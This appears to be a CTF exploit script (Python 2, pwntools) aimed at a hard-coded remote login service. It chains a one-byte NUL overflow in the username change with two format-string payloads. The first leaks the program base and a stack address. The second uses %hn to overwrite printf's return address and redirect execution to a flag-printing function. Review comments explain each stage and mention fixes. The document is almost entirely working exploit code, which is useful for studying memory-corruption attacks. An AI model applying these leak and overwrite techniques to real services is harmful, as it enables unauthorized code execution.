
@seanwupi
Created Mar 29, 2015
#!/usr/bin/env python
from pwn import * # pip install pwntools
# Python 2 script (print statements) that drives a remote login/menu service
# over TCP with pwntools and prints one line of its final output, which the
# author labels the flag. It chains the two bugs named in the author's notes:
# a one-NUL-byte overflow in the username change, then a user-controlled
# format string in the login prompt. Every numeric offset below is specific to
# the one target binary; the binary itself is not part of this page.
# NOTE(review): the endpoint is hard-coded; presumably a CTF challenge host.
r = remote('202.112.26.107', 10910)
# Stage 1 (author: "one null byte overflow"). Log in with the guest account,
# pick menu option 2 and submit a 256-character username.
# NOTE(review): presumably the name buffer is 256 bytes and the terminator is
# written one byte past it; a length check that leaves room for the NUL would
# close this. Confirm against the service source.
r.recvuntil('Login: ')
r.send('guest\n')
r.recvuntil('Password: ')
r.send('guest123\n')
r.recvuntil('Your choice: ')
r.send('2\n')
r.recvuntil('Enter your new username:\n')
r.send('A'*256 + '\n')
r.recvuntil('Your choice: ')
# Option 4 is followed by a fresh 'Login: ' prompt, so it presumably logs out.
r.send('4\n')
# Stage 2 (author: "fmt1"). The login name now consists of conversion
# specifiers, and the reply is parsed as two hex numbers, so the service is
# evidently passing the name to a printf-style formatter as the format string.
# NOTE(review): how stage 1 makes this path reachable is not visible here.
# The service-side fix is a constant format with the name as an argument.
r.recvuntil('Login: ')
r.send('%lx %48$lx '+ '\n')
r.recvuntil('Password: ')
r.send('\n')
# Everything up to the failure message, split on whitespace: tt[0] and tt[1]
# are the two leaked values.
tt = r.recvuntil('login failed.').split()
# First value minus a fixed offset gives the load base of the program
# (per the author's note), which is what a position-independent build hides.
code_base = int(tt[0], 16) - 0x1490
print 'bin =', hex(code_base)
# Second value is a stack address; the fixed distances 528 and 24 locate the
# slot the author identifies as printf()'s saved return address.
buf = int(tt[1], 16) - 528
retaddr = buf - 24
print 'printf_ret@stack = ', hex(retaddr)
# Stage 3 (author: "fmt2"). Second format string: the %c field width is the
# low 16 bits of show_flag's address and %10$hn stores that count as a 2-byte
# value through the pointer appended after the directive. Per the author only
# the lowest 2 bytes of the return address need to change.
show_flag = 0xFB3 + code_base
# ljust(16) pads the directive to 16 bytes so the packed 64-bit address follows
# at a fixed position; presumably that is what argument index 10 lines up with.
fs = ('%%%dc%%10$hn' % (show_flag&0xffff)).ljust(16) + p64(retaddr)
r.recvuntil('Login: ')
r.send(fs + '\n')
r.recvuntil('Password: ')
r.send('\n')
# The wide %c field is echoed back as padding; skip it by reading until the
# first 6 bytes of the packed address appear in the output.
# NOTE(review): only 6 of 8 bytes are matched, presumably because the top two
# bytes are NUL and end the echoed string. Confirm.
r.recvuntil(p64(retaddr)[:6])
# The next line of output is what the author calls the flag.
print r.recvuntil('\n')
r.close()